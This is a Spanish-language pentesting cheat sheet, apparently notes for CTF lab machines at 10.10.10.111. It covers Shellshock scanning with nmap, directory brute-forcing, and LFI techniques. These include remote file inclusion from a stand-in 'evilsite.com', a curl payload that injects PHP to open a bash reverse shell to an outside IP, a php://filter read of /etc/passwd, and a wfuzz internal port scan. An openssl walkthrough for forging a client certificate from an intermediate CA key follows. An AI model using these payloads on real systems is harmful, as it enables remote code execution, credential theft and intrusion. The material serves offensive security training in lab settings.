Web Enumeration

Detectar CGI vulnerable a SHELLSHOCK

nmap 10.10.10.111 -p 80 --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi

Enumeración de directorios y ficheros

gobuster dir  -u http://10.10.10.111/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x txt,php,cgi -t 50
dirb http://10.10.10.111/
dirb http://10.10.10.111/Proyecto_Final/ /usr/share/dirb/wordlists/spanish.txt

Trucos para LFI

Including Remote Code:
?file=[file|http|https|ftp]://evilsite.com/shell.txt

Using PHP stream php://input:
Specify your payload in the POST parameters
?file=php://input
curl -s --data "<?system('/bin/bash -i >& /dev/tcp/192.168.119.212/443 0>&1');?>" "http://10.10.10.111/internal/advanced_comment_system/admin.php?ACS_path=php://input%00"

Using PHP stream php://filter:
?page=php://filter/convert.base64-encode/resource=../../../../../etc/passwd

wfuzz -c -z range,1-65535 --hl=2 http://10.10.10.111:6000/url.php?path=localhost:FUZZ

Generar certificados cliente intermediate para el navegador PKCS12

===>> openssl genrsa -out gerh.key 2048 <<===
Generating RSA private key, 2048 bit long modulus (2 primes)
................................+++++
....................+++++
e is 65537 (0x010001)

===>> openssl req -new -key gerh.key -out gerh.csr <<===
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:CO
State or Province Name (full name) [Some-State]:Bogota
Locality Name (eg, city) []:Bogota
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Spartan
Organizational Unit Name (eg, section) []:SC
Common Name (e.g. server FQDN or YOUR name) []:spartan
Email Address []:gerh@spartan.com

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:

===>> openssl x509 -req -in gerh.csr -CA certs/intermediate.cert.pem -CAkey private/intermediate.key.pem -CAcreateserial -out gerh.pem -days 1024 <<===
Signature ok
subject=C = CO, ST = Some-State, O = Fortune, OU = Fortune, CN = Gerh
Getting CA Private Key

===>> openssl pkcs12 -export -out gerh.pfx -inkey gerh.key -in gerh.pem -certfile certs/intermediate.cert.pem <<===
Enter Export Password:
Verifying - Enter Export Password:

===>> curl -k --cert 0xdf.pem --key 0xdf.key https://10.10.10.111

AnteriorFile Transfers Windows SiguienteSQL Injection

Última actualización hace 3 años